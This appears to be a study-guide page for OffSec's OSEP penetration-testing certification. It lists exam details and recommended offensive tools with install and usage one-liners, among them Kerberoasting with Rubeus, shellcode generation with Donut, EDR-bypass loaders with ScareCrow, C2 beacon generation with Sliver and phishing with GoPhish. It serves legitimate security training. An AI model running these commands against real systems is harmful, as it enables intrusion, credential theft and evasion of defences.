OSEP
OffSec

Offensive Security Experienced Pentester

Expert | 48hr practical exam + report | Pass: 100+ points | $1,499

Advanced evasion, custom exploits, AD attacks. Continuation of OSCP.

Issuer: OffSec
Format: 48hr practical exam + report
Duration: 72 hours total
Pass Score: 100+ points
Valid For: 3y
Recommended Tools
CrackMapExec (Essential)
Active Directory

Swiss army knife for AD pentesting

install: pip3 install crackmapexec
usage: cme smb 10.10.10.0/24 -u user -p pass -M spider_plus
PowerView (Essential)
Active Directory

PowerShell AD enumeration toolkit

install: Import-Module PowerView.ps1
usage: Get-DomainUser -SPN; Get-DomainComputer -Unconstrained
Rubeus (Essential)
Active Directory

Kerberos interaction and abuse toolset

install: Build from source or prebuilt
usage: Rubeus.exe kerberoast /outfile:hashes.txt
Donut (Essential)
AV Evasion

Converts .NET/PE to position-independent shellcode

install: pip3 install donut-shellcode
usage: donut -f 1 -a 2 -o shellcode.bin Rubeus.exe
ScareCrow (Essential)
AV Evasion

EDR bypass payload framework

install: git clone https://github.com/optiv/ScareCrow
usage: ScareCrow -I shellcode.bin -Loader binary -domain microsoft.com
ThreatCheck (Essential)
AV Evasion

Identifies AV-triggering bytes in binaries

install: git clone https://github.com/rasta-mouse/ThreatCheck && dotnet build
usage: ThreatCheck.exe -f beacon.exe -e Defender
Cobalt Strike (Essential)
C2 Frameworks

Industry-standard C2 for adversary simulation

install: Licensed from HelpSystems
usage: teamserver 10.10.14.x pass profile.c2; connect via client
Sliver (Essential)
C2 Frameworks

Open-source cross-platform C2 framework

install: go install github.com/BishopFox/sliver/client@latest
usage: sliver-server; generate --http 10.10.14.x --os windows -o beacon.exe
Certify (Essential)
Evasion

AD CS certificate abuse tool

install: Build from source
usage: Certify.exe find /vulnerable
Evil-WinRM (Essential)
Lateral Movement

WinRM exploitation shell

install: gem install evil-winrm
usage: evil-winrm -i target -u user -p pass -s /path/to/scripts
PowerUpSQL (Essential)
MSSQL

PowerShell MSSQL attack toolkit

install: Import-Module PowerUpSQL.ps1
usage: Get-SQLInstanceDomain | Get-SQLServerInfo -Verbose
GoPhish
Phishing

Open-source phishing framework

install: go install github.com/gophish/gophish@latest
usage: ./gophish; manage campaigns at https://localhost:3333